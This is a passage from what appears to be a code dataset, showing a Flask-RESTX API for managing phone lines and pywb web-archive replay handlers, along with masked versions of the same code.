code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
|---|---|---|---|
from flask import abort
from flask_restx import Resource, Namespace, Model, fields, reqparse
from infraestructura.lineas_repo import LineasRepo
from infraestructura.equipos_repo import EquiposRepo
from infraestructura.clientes_lep_repo import ClientesLepRepo
from infraestructura.lineaequipoplan_repo import LineaEquipoPlanRepo
# Repository instances shared by every resource in this namespace.
repoLep= LineaEquipoPlanRepo()
repoLepCliente = ClientesLepRepo()
repo = LineasRepo()
repoEquipo = EquiposRepo()

nsLinea = Namespace('lineas', description='Administrador de lineas')

# Serialization model for a line without its database id (used on create).
modeloLineaSinN = Model('LineaSinNumero',{
    'numero': fields.String(),
    'estado': fields.String(),
    'activa': fields.Boolean()
})

# Full line model: the same fields plus the database id.
modeloLinea = modeloLineaSinN.clone('Linea', {
    'id': fields.Integer()
})

# Date-range payload used by search endpoints.
modeloBusqueda = Model('BusquedaFechas', {
    'desde': fields.Date(),
    'hasta': fields.Date()
})

# Register the models on the namespace so Swagger can resolve them.
nsLinea.models[modeloLinea.name] = modeloLinea
nsLinea.models[modeloLineaSinN.name] = modeloLineaSinN
nsLinea.models[modeloBusqueda.name] = modeloBusqueda

# Parser for creating a line; 'activa' is optional because POST derives
# it from 'estado'.
nuevaLineaParser = reqparse.RequestParser(bundle_errors=True)
nuevaLineaParser.add_argument('numero', type=str, required=True)
nuevaLineaParser.add_argument('estado', type=str, required=True)
nuevaLineaParser.add_argument('activa', type=bool, required=False)

# Parser for editing: same fields plus the mandatory id.
editarLineaParser = nuevaLineaParser.copy()
editarLineaParser.add_argument('id', type=int, required=True)

# Parser for date-range searches.
buscarLineasParser = reqparse.RequestParser(bundle_errors=True)
buscarLineasParser.add_argument('desde', type=str, required=True)
buscarLineasParser.add_argument('hasta', type=str, required=True)
@nsLinea.route('/')
class LineasResource(Resource):
    """Collection endpoint: list all lines and create new ones."""

    @nsLinea.marshal_list_with(modeloLinea)
    def get(self):
        """Return every line in the repository."""
        return repo.get_all()

    @nsLinea.expect(modeloLineaSinN)
    @nsLinea.marshal_with(modeloLinea)
    def post(self):
        """Create a new line.

        Returns the created line with 201, or aborts with 500 when the
        repository rejects the insert.
        """
        data = nuevaLineaParser.parse_args()
        # A line is active exactly when its state is "Activada"; the
        # client-supplied 'activa' flag is intentionally overridden.
        data.activa = (data.estado == "Activada")
        f = repo.agregar(data)
        if f:
            return f, 201
        abort(500)
@nsLinea.route('/<int:id>')
class LineasResource(Resource):
    """Single-line endpoint addressed by the url parameter ``id``."""

    @nsLinea.marshal_with(modeloLinea)
    def get(self, id):
        """Fetch one line; 404 when it does not exist."""
        # NOTE(review): looks up via get_by_numero even though the route
        # parameter is the id -- confirm this is the intended lookup.
        f = repo.get_by_numero(id)
        if f:
            return f, 200
        abort(404)

    @nsLinea.expect(modeloLinea)
    def put(self, id):
        """Update one line; 404 when the repository reports no match.

        Bug fix: the parameter was named ``numero`` while the route
        declares ``<int:id>``; Flask invokes view methods with keyword
        arguments (id=...), so every PUT raised TypeError.
        """
        data = editarLineaParser.parse_args()
        if repo.modificar(id, data):
            return 'Linea modificada', 200
        abort(404)
@nsLinea.route('/baja/<int:id>')
class LineasResource(Resource):
    """Deactivation endpoint: cascades the 'baja' to related records."""

    def put(self, id):
        """Deactivate a line plus its equipment/plan/client rows.

        Returns 200 once the line itself is deactivated; aborts with 400
        when the repository reports no such line.
        """
        if repo.baja(id):
            # Deactivate the linea-equipo-plan association.
            repoLep.baja_by_linea(id)
            # Look the association up again to reach the equipment id and
            # the cliente_lep row id.
            lineaeqplan = repoLep.buscar_by_linea(id)
            # Guard: the lookup may find nothing once the association is
            # already down; previously this raised AttributeError.
            if lineaeqplan:
                # Deactivate the equipment.
                repoEquipo.baja(lineaeqplan.equipo_id)
                # Deactivate the cliente_lep row.
                repoLepCliente.bajalep(lineaeqplan.id)
            return 'Linea dada de baja', 200
        abort(400)
|
normal
|
{
"blob_id": "821e89730fde2e12b24b52b04701c1f3501e0d57",
"index": 8771,
"step-1": "<mask token>\n\n\n@nsLinea.route('/<int:id>')\nclass LineasResource(Resource):\n <mask token>\n <mask token>\n\n\n@nsLinea.route('/baja/<int:id>')\nclass LineasResource(Resource):\n\n def put(self, id):\n if repo.baja(id):\n repoLep.baja_by_linea(id)\n lineaeqplan = repoLep.buscar_by_linea(id)\n repoEquipo.baja(lineaeqplan.equipo_id)\n repoLepCliente.bajalep(lineaeqplan.id)\n return 'Linea dada de baja', 200\n abort(400)\n",
"step-2": "<mask token>\n\n\n@nsLinea.route('/')\nclass LineasResource(Resource):\n\n @nsLinea.marshal_list_with(modeloLinea)\n def get(self):\n return repo.get_all()\n <mask token>\n\n\n@nsLinea.route('/<int:id>')\nclass LineasResource(Resource):\n\n @nsLinea.marshal_with(modeloLinea)\n def get(self, id):\n f = repo.get_by_numero(id)\n if f:\n return f, 200\n abort(404)\n\n @nsLinea.expect(modeloLinea)\n def put(self, numero):\n data = editarLineaParser.parse_args()\n if repo.modificar(numero, data):\n return 'Linea modificada', 200\n abort(404)\n\n\n@nsLinea.route('/baja/<int:id>')\nclass LineasResource(Resource):\n\n def put(self, id):\n if repo.baja(id):\n repoLep.baja_by_linea(id)\n lineaeqplan = repoLep.buscar_by_linea(id)\n repoEquipo.baja(lineaeqplan.equipo_id)\n repoLepCliente.bajalep(lineaeqplan.id)\n return 'Linea dada de baja', 200\n abort(400)\n",
"step-3": "<mask token>\n\n\n@nsLinea.route('/')\nclass LineasResource(Resource):\n\n @nsLinea.marshal_list_with(modeloLinea)\n def get(self):\n return repo.get_all()\n\n @nsLinea.expect(modeloLineaSinN)\n @nsLinea.marshal_with(modeloLinea)\n def post(self):\n data = nuevaLineaParser.parse_args()\n if data.estado == 'Activada':\n data.activa = True\n else:\n data.activa = False\n f = repo.agregar(data)\n if f:\n return f, 201\n abort(500)\n\n\n@nsLinea.route('/<int:id>')\nclass LineasResource(Resource):\n\n @nsLinea.marshal_with(modeloLinea)\n def get(self, id):\n f = repo.get_by_numero(id)\n if f:\n return f, 200\n abort(404)\n\n @nsLinea.expect(modeloLinea)\n def put(self, numero):\n data = editarLineaParser.parse_args()\n if repo.modificar(numero, data):\n return 'Linea modificada', 200\n abort(404)\n\n\n@nsLinea.route('/baja/<int:id>')\nclass LineasResource(Resource):\n\n def put(self, id):\n if repo.baja(id):\n repoLep.baja_by_linea(id)\n lineaeqplan = repoLep.buscar_by_linea(id)\n repoEquipo.baja(lineaeqplan.equipo_id)\n repoLepCliente.bajalep(lineaeqplan.id)\n return 'Linea dada de baja', 200\n abort(400)\n",
"step-4": "<mask token>\nnuevaLineaParser.add_argument('numero', type=str, required=True)\nnuevaLineaParser.add_argument('estado', type=str, required=True)\nnuevaLineaParser.add_argument('activa', type=bool, required=False)\n<mask token>\neditarLineaParser.add_argument('id', type=int, required=True)\n<mask token>\nbuscarLineasParser.add_argument('desde', type=str, required=True)\nbuscarLineasParser.add_argument('hasta', type=str, required=True)\n\n\n@nsLinea.route('/')\nclass LineasResource(Resource):\n\n @nsLinea.marshal_list_with(modeloLinea)\n def get(self):\n return repo.get_all()\n\n @nsLinea.expect(modeloLineaSinN)\n @nsLinea.marshal_with(modeloLinea)\n def post(self):\n data = nuevaLineaParser.parse_args()\n if data.estado == 'Activada':\n data.activa = True\n else:\n data.activa = False\n f = repo.agregar(data)\n if f:\n return f, 201\n abort(500)\n\n\n@nsLinea.route('/<int:id>')\nclass LineasResource(Resource):\n\n @nsLinea.marshal_with(modeloLinea)\n def get(self, id):\n f = repo.get_by_numero(id)\n if f:\n return f, 200\n abort(404)\n\n @nsLinea.expect(modeloLinea)\n def put(self, numero):\n data = editarLineaParser.parse_args()\n if repo.modificar(numero, data):\n return 'Linea modificada', 200\n abort(404)\n\n\n@nsLinea.route('/baja/<int:id>')\nclass LineasResource(Resource):\n\n def put(self, id):\n if repo.baja(id):\n repoLep.baja_by_linea(id)\n lineaeqplan = repoLep.buscar_by_linea(id)\n repoEquipo.baja(lineaeqplan.equipo_id)\n repoLepCliente.bajalep(lineaeqplan.id)\n return 'Linea dada de baja', 200\n abort(400)\n",
"step-5": "from flask import abort\nfrom flask_restx import Resource, Namespace, Model, fields, reqparse\nfrom infraestructura.lineas_repo import LineasRepo\nfrom infraestructura.equipos_repo import EquiposRepo\nfrom infraestructura.clientes_lep_repo import ClientesLepRepo\nfrom infraestructura.lineaequipoplan_repo import LineaEquipoPlanRepo\nrepoLep= LineaEquipoPlanRepo()\nrepoLepCliente = ClientesLepRepo()\nrepo = LineasRepo()\nrepoEquipo = EquiposRepo()\nnsLinea = Namespace('lineas', description='Administrador de lineas')\nmodeloLineaSinN = Model('LineaSinNumero',{\n 'numero': fields.String(),\n 'estado': fields.String(),\n 'activa': fields.Boolean()\n})\n\nmodeloLinea = modeloLineaSinN.clone('Linea', {\n 'id': fields.Integer()\n})\n\nmodeloBusqueda = Model('BusquedaFechas', {\n 'desde': fields.Date(),\n 'hasta': fields.Date()\n})\n\nnsLinea.models[modeloLinea.name] = modeloLinea\nnsLinea.models[modeloLineaSinN.name] = modeloLineaSinN\nnsLinea.models[modeloBusqueda.name] = modeloBusqueda\n\nnuevaLineaParser = reqparse.RequestParser(bundle_errors=True)\nnuevaLineaParser.add_argument('numero', type=str, required=True)\nnuevaLineaParser.add_argument('estado', type=str, required=True)\n ##PEDRO LOOK AT THIS\n ##PEDRO LOOK AT THIS\n\nnuevaLineaParser.add_argument('activa', type=bool, required=False)\n\neditarLineaParser = nuevaLineaParser.copy()\neditarLineaParser.add_argument('id', type=int, required=True)\n\nbuscarLineasParser = reqparse.RequestParser(bundle_errors=True)\nbuscarLineasParser.add_argument('desde', type=str, required=True)\nbuscarLineasParser.add_argument('hasta', type=str, required=True)\n\n\n@nsLinea.route('/')\nclass LineasResource(Resource):\n @nsLinea.marshal_list_with(modeloLinea)\n def get(self):\n return repo.get_all()\n\n @nsLinea.expect(modeloLineaSinN)\n @nsLinea.marshal_with(modeloLinea)\n def post(self):\n data = nuevaLineaParser.parse_args()\n\n ##PEDRO LOOK AT THIS\n if(data.estado ==\"Activada\"):\n data.activa = True\n else:\n 
data.activa = False\n\n f = repo.agregar(data)\n if f:\n return f, 201\n abort(500)\n\n@nsLinea.route('/<int:id>')\nclass LineasResource(Resource):\n @nsLinea.marshal_with(modeloLinea)\n def get(self, id):\n f = repo.get_by_numero(id)\n if f:\n return f, 200\n abort(404)\n\n \n \n @nsLinea.expect(modeloLinea)\n def put(self, numero):\n data = editarLineaParser.parse_args()\n if repo.modificar(numero, data):\n return 'Linea modificada', 200\n abort(404)\n@nsLinea.route('/baja/<int:id>')\nclass LineasResource(Resource):\n\n def put(self, id):\n if repo.baja(id):\n # doy de baja en lineaEquipoPlan\n\n repoLep.baja_by_linea(id)\n\n # busco para darle de baja al equipo \n # y tener tmb el id pa la tabla cliente_lep\n lineaeqplan = repoLep.buscar_by_linea(id)\n\n #doy de baja el equipo\n repoEquipo.baja(lineaeqplan.equipo_id)\n #doy de baja en tabla cliente_lep\n repoLepCliente.bajalep(lineaeqplan.id)\n\n return 'Linea dada de baja', 200\n abort(400) \n\n",
"step-ids": [
3,
7,
8,
9,
12
]
}
|
[
3,
7,
8,
9,
12
] |
import pkgutil
import mimetypes
import time
from datetime import datetime
from pywb.utils.wbexception import NotFoundException
from pywb.utils.loaders import BlockLoader
from pywb.utils.statusandheaders import StatusAndHeaders
from pywb.framework.basehandlers import BaseHandler, WbUrlHandler
from pywb.framework.wbrequestresponse import WbResponse
from pywb.warc.recordloader import ArcWarcRecordLoader
from pywb.warc.resolvingloader import ResolvingLoader
from views import J2TemplateView
from replay_views import ReplayView
from pywb.framework.memento import MementoResponse
from pywb.utils.timeutils import datetime_to_timestamp
#=================================================================
class SearchPageWbUrlHandler(WbUrlHandler):
    """
    Loads a default search page html template to be shown when
    the wb_url is empty
    """
    def __init__(self, config):
        # Template rendered for a bare '/' request (no wb_url).
        self.search_view = (J2TemplateView.
                            create_template(config.get('search_html'),
                                            'Search Page'))

        self.is_frame_mode = config.get('framed_replay', False)
        self.response_class = WbResponse

        if self.is_frame_mode:
            # Framed replay: prepare the top-frame insert template and the
            # banner shown inside the frame.
            html = config.get('frame_insert_html', 'ui/frame_insert.html')
            self.frame_insert_view = (J2TemplateView.
                                      create_template(html, 'Frame Insert'))

            self.banner_html = config.get('banner_html', 'banner.html')

            if config.get('enable_memento', False):
                self.response_class = MementoResponse
        else:
            self.frame_insert_view = None
            self.banner_html = None

    def render_search_page(self, wbrequest, **kwargs):
        """Render the configured search page, or a plain-text fallback."""
        if self.search_view:
            return self.search_view.render_response(wbrequest=wbrequest,
                                                    prefix=wbrequest.wb_prefix,
                                                    **kwargs)
        else:
            return WbResponse.text_response('No Lookup Url Specified')

    def __call__(self, wbrequest):
        # root search page
        if wbrequest.wb_url_str == '/':
            return self.render_search_page(wbrequest)

        # render top level frame if in frame mode
        # (not supported in proxy mode)
        if (self.is_frame_mode and wbrequest.wb_url and
            not wbrequest.wb_url.is_query() and
            not wbrequest.options['is_proxy']):
            if wbrequest.wb_url.is_top_frame:
                return self.get_top_frame_response(wbrequest)
            else:
                # Inner frame: switch the final modifier so replay renders
                # the frame content variant.
                wbrequest.final_mod = 'tf_'

        return self.handle_request(wbrequest)

    def get_top_frame_params(self, wbrequest):
        """Build the template parameters for the top-frame insert."""
        embed_url = wbrequest.wb_url.to_str(mod='')

        if wbrequest.wb_url.timestamp:
            timestamp = wbrequest.wb_url.timestamp
        else:
            # No timestamp in the url: default to "now".
            timestamp = datetime_to_timestamp(datetime.utcnow())

        params = dict(embed_url=embed_url,
                      wbrequest=wbrequest,
                      timestamp=timestamp,
                      url=wbrequest.wb_url.url,
                      banner_html=self.banner_html)

        return params

    def get_top_frame_response(self, wbrequest):
        """Render the top-level frame html as a complete 200 response."""
        params = self.get_top_frame_params(wbrequest)

        headers = [('Content-Type', 'text/html; charset=utf-8')]
        status_headers = StatusAndHeaders('200 OK', headers)

        template_result = self.frame_insert_view.render_to_string(**params)
        body = template_result.encode('utf-8')

        return self.response_class(status_headers, [body], wbrequest=wbrequest)
#=================================================================
# Standard WB Handler
#=================================================================
class WBHandler(SearchPageWbUrlHandler):
    """Standard web-archive replay handler: query the index, then replay
    or render the cdx results, falling back to another handler on 404."""

    def __init__(self, query_handler, config=None):
        super(WBHandler, self).__init__(config)

        self.index_reader = query_handler

        cookie_maker = config.get('cookie_maker')
        record_loader = ArcWarcRecordLoader(cookie_maker=cookie_maker)

        paths = config.get('archive_paths')

        resolving_loader = ResolvingLoader(paths=paths,
                                           record_loader=record_loader)

        self.replay = ReplayView(resolving_loader, config)

        # Fallback handler is resolved later (see resolve_refs), once all
        # handlers have been constructed.
        self.fallback_handler = None
        self.fallback_name = config.get('fallback')

    def resolve_refs(self, handler_dict):
        """Late-bind the fallback handler by name from the handler map."""
        if self.fallback_name:
            self.fallback_handler = handler_dict.get(self.fallback_name)

    def handle_request(self, wbrequest):
        """Load cdx index entries for the request, then dispatch to
        replay or query rendering."""
        try:
            cdx_lines, output = self.index_reader.load_for_request(wbrequest)
        except NotFoundException as nfe:
            return self.handle_not_found(wbrequest, nfe)

        if output != 'text' and wbrequest.wb_url.is_replay():
            return self.handle_replay(wbrequest, cdx_lines)
        else:
            return self.handle_query(wbrequest, cdx_lines, output)

    def handle_query(self, wbrequest, cdx_lines, output):
        """Render the cdx query results in the requested output format."""
        return self.index_reader.make_cdx_response(wbrequest,
                                                   cdx_lines,
                                                   output)

    def handle_replay(self, wbrequest, cdx_lines):
        """Replay archived content for the matched cdx lines."""
        cdx_callback = self.index_reader.cdx_load_callback(wbrequest)

        return self.replay.render_content(wbrequest,
                                          cdx_lines,
                                          cdx_callback)

    def handle_not_found(self, wbrequest, nfe):
        """Delegate a miss to the fallback handler, or re-raise.

        NOTE: the bare ``raise`` works because this method is only called
        from inside handle_request's ``except NotFoundException`` block,
        which re-raises ``nfe`` with its original traceback.
        """
        if (not self.fallback_handler or
            wbrequest.wb_url.is_query() or
            wbrequest.wb_url.is_identity):
            raise

        return self.fallback_handler(wbrequest)

    def __str__(self):
        return 'Web Archive Replay Handler'
#=================================================================
# Static Content Handler
#=================================================================
class StaticHandler(BaseHandler):
    """Serves static files found under a configured path prefix."""

    def __init__(self, static_path):
        mimetypes.init()
        self.static_path = static_path
        self.block_loader = BlockLoader()

    def __call__(self, wbrequest):
        """Load the requested file and stream it back; 404 on any IOError."""
        # Strip the query string from the requested path.
        url = wbrequest.wb_url_str.split('?')[0]
        full_path = self.static_path + url

        try:
            data = self.block_loader.load(full_path)

            try:
                # Measure length by seeking to the end; may fail on
                # non-seekable streams, in which case no Content-Length
                # header is sent.
                data.seek(0, 2)
                size = data.tell()
                data.seek(0)
                headers = [('Content-Length', str(size))]
            except IOError:
                headers = None

            if 'wsgi.file_wrapper' in wbrequest.env:
                reader = wbrequest.env['wsgi.file_wrapper'](data)
            else:
                reader = iter(lambda: data.read(), '')
            # NOTE(review): 'reader' is computed but never used -- the
            # response below streams 'data' directly. Confirm whether
            # text_stream was meant to receive 'reader' instead.

            content_type, _ = mimetypes.guess_type(full_path)

            return WbResponse.text_stream(data,
                                          content_type=content_type,
                                          headers=headers)

        except IOError:
            raise NotFoundException('Static File Not Found: ' +
                                    wbrequest.wb_url_str)

    def __str__(self):  # pragma: no cover
        return 'Static files from ' + self.static_path
#=================================================================
# Debug Handlers
#=================================================================
class DebugEchoEnvHandler(BaseHandler):  # pragma: no cover
    """Debug handler: echoes the raw WSGI environ back as plain text."""

    def __call__(self, wbrequest):
        env_dump = str(wbrequest.env)
        return WbResponse.text_response(env_dump)
#=================================================================
class DebugEchoHandler(BaseHandler):  # pragma: no cover
    """Debug handler: echoes the whole wbrequest back as plain text."""

    def __call__(self, wbrequest):
        request_dump = str(wbrequest)
        return WbResponse.text_response(request_dump)
|
normal
|
{
"blob_id": "df1486afcc99e03510512ed6ed3e8b3471459d50",
"index": 5343,
"step-1": "<mask token>\n\n\nclass WBHandler(SearchPageWbUrlHandler):\n <mask token>\n <mask token>\n <mask token>\n\n def handle_query(self, wbrequest, cdx_lines, output):\n return self.index_reader.make_cdx_response(wbrequest, cdx_lines, output\n )\n <mask token>\n <mask token>\n <mask token>\n\n\nclass StaticHandler(BaseHandler):\n\n def __init__(self, static_path):\n mimetypes.init()\n self.static_path = static_path\n self.block_loader = BlockLoader()\n\n def __call__(self, wbrequest):\n url = wbrequest.wb_url_str.split('?')[0]\n full_path = self.static_path + url\n try:\n data = self.block_loader.load(full_path)\n try:\n data.seek(0, 2)\n size = data.tell()\n data.seek(0)\n headers = [('Content-Length', str(size))]\n except IOError:\n headers = None\n if 'wsgi.file_wrapper' in wbrequest.env:\n reader = wbrequest.env['wsgi.file_wrapper'](data)\n else:\n reader = iter(lambda : data.read(), '')\n content_type, _ = mimetypes.guess_type(full_path)\n return WbResponse.text_stream(data, content_type=content_type,\n headers=headers)\n except IOError:\n raise NotFoundException('Static File Not Found: ' + wbrequest.\n wb_url_str)\n\n def __str__(self):\n return 'Static files from ' + self.static_path\n\n\nclass DebugEchoEnvHandler(BaseHandler):\n\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest.env))\n\n\nclass DebugEchoHandler(BaseHandler):\n\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest))\n",
"step-2": "<mask token>\n\n\nclass SearchPageWbUrlHandler(WbUrlHandler):\n <mask token>\n <mask token>\n\n def render_search_page(self, wbrequest, **kwargs):\n if self.search_view:\n return self.search_view.render_response(wbrequest=wbrequest,\n prefix=wbrequest.wb_prefix, **kwargs)\n else:\n return WbResponse.text_response('No Lookup Url Specified')\n\n def __call__(self, wbrequest):\n if wbrequest.wb_url_str == '/':\n return self.render_search_page(wbrequest)\n if (self.is_frame_mode and wbrequest.wb_url and not wbrequest.\n wb_url.is_query() and not wbrequest.options['is_proxy']):\n if wbrequest.wb_url.is_top_frame:\n return self.get_top_frame_response(wbrequest)\n else:\n wbrequest.final_mod = 'tf_'\n return self.handle_request(wbrequest)\n <mask token>\n <mask token>\n\n\nclass WBHandler(SearchPageWbUrlHandler):\n\n def __init__(self, query_handler, config=None):\n super(WBHandler, self).__init__(config)\n self.index_reader = query_handler\n cookie_maker = config.get('cookie_maker')\n record_loader = ArcWarcRecordLoader(cookie_maker=cookie_maker)\n paths = config.get('archive_paths')\n resolving_loader = ResolvingLoader(paths=paths, record_loader=\n record_loader)\n self.replay = ReplayView(resolving_loader, config)\n self.fallback_handler = None\n self.fallback_name = config.get('fallback')\n\n def resolve_refs(self, handler_dict):\n if self.fallback_name:\n self.fallback_handler = handler_dict.get(self.fallback_name)\n\n def handle_request(self, wbrequest):\n try:\n cdx_lines, output = self.index_reader.load_for_request(wbrequest)\n except NotFoundException as nfe:\n return self.handle_not_found(wbrequest, nfe)\n if output != 'text' and wbrequest.wb_url.is_replay():\n return self.handle_replay(wbrequest, cdx_lines)\n else:\n return self.handle_query(wbrequest, cdx_lines, output)\n\n def handle_query(self, wbrequest, cdx_lines, output):\n return self.index_reader.make_cdx_response(wbrequest, cdx_lines, output\n )\n\n def handle_replay(self, wbrequest, 
cdx_lines):\n cdx_callback = self.index_reader.cdx_load_callback(wbrequest)\n return self.replay.render_content(wbrequest, cdx_lines, cdx_callback)\n\n def handle_not_found(self, wbrequest, nfe):\n if not self.fallback_handler or wbrequest.wb_url.is_query(\n ) or wbrequest.wb_url.is_identity:\n raise\n return self.fallback_handler(wbrequest)\n\n def __str__(self):\n return 'Web Archive Replay Handler'\n\n\nclass StaticHandler(BaseHandler):\n\n def __init__(self, static_path):\n mimetypes.init()\n self.static_path = static_path\n self.block_loader = BlockLoader()\n\n def __call__(self, wbrequest):\n url = wbrequest.wb_url_str.split('?')[0]\n full_path = self.static_path + url\n try:\n data = self.block_loader.load(full_path)\n try:\n data.seek(0, 2)\n size = data.tell()\n data.seek(0)\n headers = [('Content-Length', str(size))]\n except IOError:\n headers = None\n if 'wsgi.file_wrapper' in wbrequest.env:\n reader = wbrequest.env['wsgi.file_wrapper'](data)\n else:\n reader = iter(lambda : data.read(), '')\n content_type, _ = mimetypes.guess_type(full_path)\n return WbResponse.text_stream(data, content_type=content_type,\n headers=headers)\n except IOError:\n raise NotFoundException('Static File Not Found: ' + wbrequest.\n wb_url_str)\n\n def __str__(self):\n return 'Static files from ' + self.static_path\n\n\nclass DebugEchoEnvHandler(BaseHandler):\n\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest.env))\n\n\nclass DebugEchoHandler(BaseHandler):\n\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest))\n",
"step-3": "<mask token>\n\n\nclass SearchPageWbUrlHandler(WbUrlHandler):\n <mask token>\n <mask token>\n\n def render_search_page(self, wbrequest, **kwargs):\n if self.search_view:\n return self.search_view.render_response(wbrequest=wbrequest,\n prefix=wbrequest.wb_prefix, **kwargs)\n else:\n return WbResponse.text_response('No Lookup Url Specified')\n\n def __call__(self, wbrequest):\n if wbrequest.wb_url_str == '/':\n return self.render_search_page(wbrequest)\n if (self.is_frame_mode and wbrequest.wb_url and not wbrequest.\n wb_url.is_query() and not wbrequest.options['is_proxy']):\n if wbrequest.wb_url.is_top_frame:\n return self.get_top_frame_response(wbrequest)\n else:\n wbrequest.final_mod = 'tf_'\n return self.handle_request(wbrequest)\n\n def get_top_frame_params(self, wbrequest):\n embed_url = wbrequest.wb_url.to_str(mod='')\n if wbrequest.wb_url.timestamp:\n timestamp = wbrequest.wb_url.timestamp\n else:\n timestamp = datetime_to_timestamp(datetime.utcnow())\n params = dict(embed_url=embed_url, wbrequest=wbrequest, timestamp=\n timestamp, url=wbrequest.wb_url.url, banner_html=self.banner_html)\n return params\n\n def get_top_frame_response(self, wbrequest):\n params = self.get_top_frame_params(wbrequest)\n headers = [('Content-Type', 'text/html; charset=utf-8')]\n status_headers = StatusAndHeaders('200 OK', headers)\n template_result = self.frame_insert_view.render_to_string(**params)\n body = template_result.encode('utf-8')\n return self.response_class(status_headers, [body], wbrequest=wbrequest)\n\n\nclass WBHandler(SearchPageWbUrlHandler):\n\n def __init__(self, query_handler, config=None):\n super(WBHandler, self).__init__(config)\n self.index_reader = query_handler\n cookie_maker = config.get('cookie_maker')\n record_loader = ArcWarcRecordLoader(cookie_maker=cookie_maker)\n paths = config.get('archive_paths')\n resolving_loader = ResolvingLoader(paths=paths, record_loader=\n record_loader)\n self.replay = ReplayView(resolving_loader, config)\n 
self.fallback_handler = None\n self.fallback_name = config.get('fallback')\n\n def resolve_refs(self, handler_dict):\n if self.fallback_name:\n self.fallback_handler = handler_dict.get(self.fallback_name)\n\n def handle_request(self, wbrequest):\n try:\n cdx_lines, output = self.index_reader.load_for_request(wbrequest)\n except NotFoundException as nfe:\n return self.handle_not_found(wbrequest, nfe)\n if output != 'text' and wbrequest.wb_url.is_replay():\n return self.handle_replay(wbrequest, cdx_lines)\n else:\n return self.handle_query(wbrequest, cdx_lines, output)\n\n def handle_query(self, wbrequest, cdx_lines, output):\n return self.index_reader.make_cdx_response(wbrequest, cdx_lines, output\n )\n\n def handle_replay(self, wbrequest, cdx_lines):\n cdx_callback = self.index_reader.cdx_load_callback(wbrequest)\n return self.replay.render_content(wbrequest, cdx_lines, cdx_callback)\n\n def handle_not_found(self, wbrequest, nfe):\n if not self.fallback_handler or wbrequest.wb_url.is_query(\n ) or wbrequest.wb_url.is_identity:\n raise\n return self.fallback_handler(wbrequest)\n\n def __str__(self):\n return 'Web Archive Replay Handler'\n\n\nclass StaticHandler(BaseHandler):\n\n def __init__(self, static_path):\n mimetypes.init()\n self.static_path = static_path\n self.block_loader = BlockLoader()\n\n def __call__(self, wbrequest):\n url = wbrequest.wb_url_str.split('?')[0]\n full_path = self.static_path + url\n try:\n data = self.block_loader.load(full_path)\n try:\n data.seek(0, 2)\n size = data.tell()\n data.seek(0)\n headers = [('Content-Length', str(size))]\n except IOError:\n headers = None\n if 'wsgi.file_wrapper' in wbrequest.env:\n reader = wbrequest.env['wsgi.file_wrapper'](data)\n else:\n reader = iter(lambda : data.read(), '')\n content_type, _ = mimetypes.guess_type(full_path)\n return WbResponse.text_stream(data, content_type=content_type,\n headers=headers)\n except IOError:\n raise NotFoundException('Static File Not Found: ' + wbrequest.\n 
wb_url_str)\n\n def __str__(self):\n return 'Static files from ' + self.static_path\n\n\nclass DebugEchoEnvHandler(BaseHandler):\n\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest.env))\n\n\nclass DebugEchoHandler(BaseHandler):\n\n def __call__(self, wbrequest):\n return WbResponse.text_response(str(wbrequest))\n",
"step-4": "<mask token>\n\n\nclass SearchPageWbUrlHandler(WbUrlHandler):\n <mask token>\n\n def __init__(self, config):\n self.search_view = J2TemplateView.create_template(config.get(\n 'search_html'), 'Search Page')\n self.is_frame_mode = config.get('framed_replay', False)\n self.response_class = WbResponse\n if self.is_frame_mode:\n html = config.get('frame_insert_html', 'ui/frame_insert.html')\n self.frame_insert_view = J2TemplateView.create_template(html,\n 'Frame Insert')\n self.banner_html = config.get('banner_html', 'banner.html')\n if config.get('enable_memento', False):\n self.response_class = MementoResponse\n else:\n self.frame_insert_view = None\n self.banner_html = None\n\n def render_search_page(self, wbrequest, **kwargs):\n if self.search_view:\n return self.search_view.render_response(wbrequest=wbrequest,\n prefix=wbrequest.wb_prefix, **kwargs)\n else:\n return WbResponse.text_response('No Lookup Url Specified')\n\n def __call__(self, wbrequest):\n if wbrequest.wb_url_str == '/':\n return self.render_search_page(wbrequest)\n if (self.is_frame_mode and wbrequest.wb_url and not wbrequest.\n wb_url.is_query() and not wbrequest.options['is_proxy']):\n if wbrequest.wb_url.is_top_frame:\n return self.get_top_frame_response(wbrequest)\n else:\n wbrequest.final_mod = 'tf_'\n return self.handle_request(wbrequest)\n\n def get_top_frame_params(self, wbrequest):\n embed_url = wbrequest.wb_url.to_str(mod='')\n if wbrequest.wb_url.timestamp:\n timestamp = wbrequest.wb_url.timestamp\n else:\n timestamp = datetime_to_timestamp(datetime.utcnow())\n params = dict(embed_url=embed_url, wbrequest=wbrequest, timestamp=\n timestamp, url=wbrequest.wb_url.url, banner_html=self.banner_html)\n return params\n\n def get_top_frame_response(self, wbrequest):\n params = self.get_top_frame_params(wbrequest)\n headers = [('Content-Type', 'text/html; charset=utf-8')]\n status_headers = StatusAndHeaders('200 OK', headers)\n template_result = 
self.frame_insert_view.render_to_string(**params)\n body = template_result.encode('utf-8')\n return self.response_class(status_headers, [body], wbrequest=wbrequest)\n\n\nclass WBHandler(SearchPageWbUrlHandler):\n\n def __init__(self, query_handler, config=None):\n super(WBHandler, self).__init__(config)\n self.index_reader = query_handler\n cookie_maker = config.get('cookie_maker')\n record_loader = ArcWarcRecordLoader(cookie_maker=cookie_maker)\n paths = config.get('archive_paths')\n resolving_loader = ResolvingLoader(paths=paths, record_loader=\n record_loader)\n self.replay = ReplayView(resolving_loader, config)\n self.fallback_handler = None\n self.fallback_name = config.get('fallback')\n\n def resolve_refs(self, handler_dict):\n if self.fallback_name:\n self.fallback_handler = handler_dict.get(self.fallback_name)\n\n def handle_request(self, wbrequest):\n try:\n cdx_lines, output = self.index_reader.load_for_request(wbrequest)\n except NotFoundException as nfe:\n return self.handle_not_found(wbrequest, nfe)\n if output != 'text' and wbrequest.wb_url.is_replay():\n return self.handle_replay(wbrequest, cdx_lines)\n else:\n return self.handle_query(wbrequest, cdx_lines, output)\n\n def handle_query(self, wbrequest, cdx_lines, output):\n return self.index_reader.make_cdx_response(wbrequest, cdx_lines, output\n )\n\n def handle_replay(self, wbrequest, cdx_lines):\n cdx_callback = 